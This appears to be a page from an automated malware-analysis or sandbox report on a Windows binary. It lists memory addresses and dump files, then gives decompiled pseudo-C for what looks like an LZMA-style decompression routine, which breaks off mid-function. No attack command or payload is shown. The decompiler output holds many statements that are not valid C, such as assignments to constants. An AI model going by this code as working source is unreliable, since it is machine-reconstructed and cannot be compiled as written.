0x00000000
0x00406b0a
0x00406b0a
0x00406b0e
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00000000
0x00000000
0x00406c95
0x00406c95
0x00406c99
0x0040715f
0x00000000
0x0040715f
0x00406c9f
0x00406ca2
0x00406ca5
0x00406ca8
0x00406caa
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406ccb
0x00406cce
0x00406cd0
0x00406cd0
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00406cd3
0x00406cd3
0x00000000
0x00406cd3
0x00406f54
0x00407189
0x00000000
0x00000000
0x004067b8
0x004071c0
0x004071c0
0x00000000
0x004071c0
0x0040700d
0x00406f94
0x00406f91
0x00000000
0x00406bc8

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
Instruction ID: 28a04b8f37ec13448d59bb684de8c36190a5ca9e173ef22aca7ace3c2f707fcc
Opcode Fuzzy Hash: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
Instruction Fuzzy Hash: F2713471D04229CFDF28CF98C8447ADBBB1FB48305F15806AD846BB281C7386996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406CE2, Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406CE2() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
